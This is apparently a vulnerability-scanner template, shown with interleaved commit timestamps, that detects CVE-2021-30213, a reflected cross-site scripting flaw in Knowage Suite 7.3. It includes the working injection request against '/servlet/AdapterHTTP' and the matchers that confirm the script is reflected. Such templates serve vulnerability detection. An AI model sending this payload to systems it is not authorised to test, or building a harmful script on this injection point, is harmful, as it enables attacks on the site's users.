2021-11-24 15:43:59 +00:00
id : CVE-2021-30213
info :
2022-08-29 13:55:23 +00:00
name : Knowage Suite 7.3 - Cross-Site Scripting
2021-11-24 15:43:59 +00:00
author : alph4byt3
severity : medium
2022-08-29 13:55:23 +00:00
description : Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-30213
2021-12-03 07:23:34 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-12-03 07:23:34 +00:00
cve-id : CVE-2021-30213
cwe-id : CWE-79
2021-12-03 07:23:01 +00:00
tags : cve,cve2021,xss,knowage
2021-11-24 15:43:59 +00:00
requests :
- method : GET
path :
2021-12-03 07:23:01 +00:00
- "{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-11-24 15:43:59 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2021-12-03 07:23:01 +00:00
words :
- '</script><script>alert(document.domain)</script>'
2021-11-24 15:43:59 +00:00
- type : status
status :
- 200
- type : word
part : header
words :
- text/html
2022-08-29 13:55:23 +00:00
# Enhanced by mp on 2022/08/28